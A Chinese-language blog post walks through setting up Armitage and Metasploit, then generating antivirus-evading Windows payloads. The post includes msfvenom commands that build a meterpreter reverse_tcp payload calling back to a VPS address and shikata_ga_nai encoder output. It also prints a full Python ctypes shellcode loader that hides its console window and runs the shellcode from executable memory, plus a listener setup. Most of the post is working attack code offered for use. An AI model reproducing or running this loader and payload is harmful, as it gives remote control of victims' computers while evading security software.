Armitage使用

一直想搞一波事情

初次使用armitage

启动postgresql

1
service postgresql start

切换postgres用户

1
su postgres

输入命令创建一个postgresql数据库账户:

1
createuser msf1 -P

提示输入密码。

创建数据库

owner参数指定数据库的所有者,最后一个参数为数据库名称。

1
createdb --owner=msf1 msf1

启动Metasploit

1
root@RcoIl:~# msfconsole

连接数据库

1
msf > db_connect msf1:msf1@localhost/msf1

启动armitage

端口转发

将vps上8888端口的流量转发到6665端口。而本地连接vps上的6665端口即可。

生成免杀exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@RcoIl:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=8888 LHOST=139.199.xxx.xxx -e x86/shikata_ga_nai -i 11 -f py -o /root/rcoil.py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai succeeded with size 630 (iteration=10)
x86/shikata_ga_nai chosen with final size 630
Payload size: 630 bytes
Final size of py file: 3020 bytes
Saved as: /root/rcoil.py

将生成得rcoil.py进行改写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
from ctypes import *
import ctypes
buf = ""
buf += "\xda\xc2\xb8\x5a\xb8\x23\x52\xd9\x74\x24\xf4\x5b\x2b"
buf += "\xc9\xb1\x97\x31\x43\x1a\x83\xc3\x04\x03\x43\x16\xe2"
buf += "\xaf\x63\xfc\x8b\x3b\xb0\xf7\x94\x6d\xde\x62\x60\x2a"
buf += "\x36\x44\xd8\x5d\x79\x15\x0c\xde\x91\x65\x31\x0d\x10"
buf += "\xe1\x47\xe7\x77\xc0\x18\xf7\x11\x54\xc4\x1b\x10\x6f"
buf += "\xb3\xc4\xac\x3a\xc6\x0c\xf4\x4a\x39\x28\x85\x7f\xd7"
buf += "\xc6\x28\x9d\xae\x34\x11\x7b\x59\x26\xb3\xbf\xca\xf7"
buf += "\xa3\x77\x33\x9c\x9f\x29\x4b\xf9\xa7\x2f\x12\xfb\x2f"
buf += "\xea\x3f\x22\xa2\x42\x5b\xc5\xc5\xb8\xda\x28\x03\x3a"
buf += "\xf6\x3f\x8b\x43\x91\x73\x78\x38\x92\x99\x1b\x07\x2c"
buf += "\x77\xe7\xde\xf3\xc4\xf9\x10\xfd\xae\x88\x00\xf2\x79"
buf += "\xac\x2a\x07\x25\x96\xbd\x31\xe0\xff\xef\xc9\xc3\xea"
buf += "\x3b\xcc\x0a\x00\x27\x43\xa4\x60\x1f\x3c\x5b\xc4\xa0"
buf += "\x46\x65\xf1\xfc\x82\x8e\x10\x97\x1e\x05\x1e\x76\xae"
buf += "\xc7\xe3\xad\xe0\x09\x5a\x0a\x2a\x04\x9e\x71\x86\x23"
buf += "\xe0\x81\x63\x6f\x75\xca\xda\x24\x66\xbe\x4b\xb9\x3d"
buf += "\x98\x78\xfe\xd8\x3c\x3c\x87\x3d\x61\x48\xc7\xf4\x67"
buf += "\x59\x1e\x79\xf6\xf8\x71\xeb\x5a\xbb\x20\xb7\x2b\xd6"
buf += "\x26\xf6\x77\x6d\xd4\x33\x90\x42\x9c\xff\xef\x44\xb7"
buf += "\x1a\xec\x6a\xa6\x66\x6d\x1f\xaa\xdb\x84\x80\x68\xc4"
buf += "\x47\x96\xf4\x09\x15\xff\x0f\xff\xb9\x0c\x8e\x5c\xbe"
buf += "\x44\x93\xa4\x7c\xcd\x7f\x0c\x57\x24\xd4\x83\x89\xef"
buf += "\x03\x80\x79\xfd\x83\x33\x85\x76\x50\xa8\xae\x17\x03"
buf += "\x91\xc2\x66\x71\x72\x1e\x25\x35\x7d\xd7\x8b\x2c\xe5"
buf += "\x57\xc9\xce\xb2\xaa\xe3\xbb\x71\xb5\x23\x45\xa3\x90"
buf += "\xbb\xfb\xa0\x07\xaa\x1c\xf7\xd0\x34\x24\xa9\xb1\x8e"
buf += "\xbd\x7c\x52\xa8\xe1\x70\x25\xf4\x57\x90\x69\xf1\xfb"
buf += "\xc2\x44\xac\xa9\xb4\x6d\x84\xfb\x05\x7d\x3b\xfb\x70"
buf += "\xa0\x03\x90\xe5\xcf\x77\x3e\xb9\x39\x44\x1e\xa1\x8d"
buf += "\x55\x44\x3a\xf7\x8e\xe4\x35\x64\xd7\x63\xcb\xc3\x3d"
buf += "\x48\xb3\xaa\x67\xe3\x17\xc1\xaa\x4c\x62\x6a\x4e\xfb"
buf += "\x2e\x16\x70\xa3\xc9\x70\xfa\x0e\x7e\xea\xc3\xf3\x9b"
buf += "\x9a\xed\x9a\xbe\xcd\x32\xc6\x66\x80\xb0\x92\x20\x55"
buf += "\x58\x1e\x5b\xbf\x7f\x54\x7d\x64\xe3\x9b\x81\xd3\x25"
buf += "\x65\x2c\x42\xd0\xc3\x07\x5f\xa3\x12\x75\x5a\xcf\x52"
buf += "\x62\xf2\xa8\xe0\xcf\x93\x2f\x1b\xb6\x2c\x18\x0e\x0e"
buf += "\x42\xaa\xd8\x3b\x01\x1b\x7d\x04\x78\x42\x10\x40\x83"
buf += "\xce\xf2\xb4\x2b\x42\xd9\xf6\x84\xa7\xd4\xb3\x2d\x78"
buf += "\xb0\x18\xa0\x9c\xfa\x23\xd1\xd7\x65\x36\xf4\x26\xaa"
buf += "\x5e\x29\xb8\xdc\x0e\x84\xef\xc0\x71\xbf\xce\x24\xb0"
buf += "\x10\x03\x95\x90\x03\x58\xde\x52\x6f\x37\xc4\x5c\xe7"
buf += "\x43\x27\x0a\xa7\xa5\x20\xa5\xab\x73\x70\x03\x48\xab"
buf += "\x8c\x67\x09\xbc\xec\xd4\x04\x70\xe9\xda\x9e\xe2\xb9"
buf += "\xac\xa3\xd6\x65\xd2\xec\x52\x4c\xbe\x8e\x0d\x27\xa1"
buf += "\x67\xc2\x9c\x34\x71\xf3\x0c\x7e\xec\x6c\x4f\x98\xb9"
buf += "\xe7\x1c\x24\x2e\x68\xc8\x59\xa2\xdc\x7f\xeb\x41\x19"
buf += "\x4e\x61\x1e\x9f\xd7\xfb\xb7\x3a\xf0\xbb\xb4\x33\xcf"
buf += "\xf9\xb2\xa1\xe9\x67\x0f\x4c\x88\x7d\xc5\x90\x74\xf2"
buf += "\x5a\xd4\x25\xca\xaa\x63"
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
if 0 == addr:
raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
raise Exception("Failed to set protection on buffer")
return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
if 666==666:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
buf,
ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
print "Code By Luan"
shell()

免杀来自luan
再编译为exe

或则直接生成exe,但是这样免杀效果就不好

1
2
3
4
5
6
root@RcoIl:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=139.199.xxx.xxx LPORT=8888 -f exe > /root/test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes

内网msf连接vps

选择:armitage->listeners->bind

HOST写VPS的IP,PORT写6665,shell类型选择meterpreter
看图,发现已经链接上了。

测试结果

!坚持技术分享,您的支持将鼓励我继续创作!